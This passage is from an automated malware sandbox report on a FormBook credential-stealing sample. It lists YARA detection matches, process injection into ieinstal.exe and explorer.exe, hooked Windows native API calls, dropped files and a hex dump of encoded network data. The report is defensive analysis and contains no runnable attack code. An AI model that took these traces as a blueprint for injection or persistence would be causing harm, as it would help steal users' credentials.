38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Detected FormBook malwareShow sources
        Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logri.iniJump to dropped file
        Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logrv.iniJump to dropped file
        Malicious sample detected (through community Yara rule)Show sources
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419C90 NtCreateFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419D40 NtReadFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419DC0 NtClose,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419E70 NtAllocateVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419C8A NtCreateFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419D3A NtReadFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419DBA NtClose,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00419E6A NtAllocateVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A99A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A98F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9540 NtReadFile,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A95D0 NtClose,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9B00 NtSetValueKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AA3B0 NtGetContextThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A10 NtQuerySection,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9A80 NtOpenDirectoryObject,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9950 NtQueueApcThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A99D0 NtCreateProcessEx,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9820 NtEnumerateKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AB040 NtSuspendThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A98A0 NtWriteVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AA710 NtOpenProcessToken,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9730 NtQueryVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9770 NtSetInformationFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AA770 NtOpenThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9760 NtOpenProcess,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9FE0 NtCreateMutant,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9610 NtEnumerateValueKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9650 NtQueryValueKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9670 NtQueryInformationProcess,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A96D0 NtCreateKey,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031AAD30 NtSetContextThread,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9520 NtWaitForSingleObject,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A9560 NtWriteFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031A95F0 NtQueryInformationFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00401030
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041D97B
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DADA
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DBC0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00402D90
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DDA4
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041E654
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DE0B
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00409E2E
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00409E30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041CEE3
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041CEE6
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DEFF
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0041DF1F
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_00402FB0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0319EBB0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0316F900
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03184120
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03221002
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0317B090
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_031920A0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03186E30
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03160D20
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03231D55
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_03192581
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0317D5E0
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 9_2_0317841F
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: 19_3_04B26EB0
        Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 50484224 appears 50 times
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeCode function: String function: 0231C890 appears 48 times
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 0316B150 appears 32 times
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: String function: 04B2B4A4 appears 32 times
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeCode function: String function: 04B23AF4 appears 40 times
        Source: Mqbmupv_Signed_.exeStatic PE information: invalid certificate
        Source: Mqbmupv_Signed_.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Mqbmupv_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Mqbmnet.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Mqbmnet.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
        Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
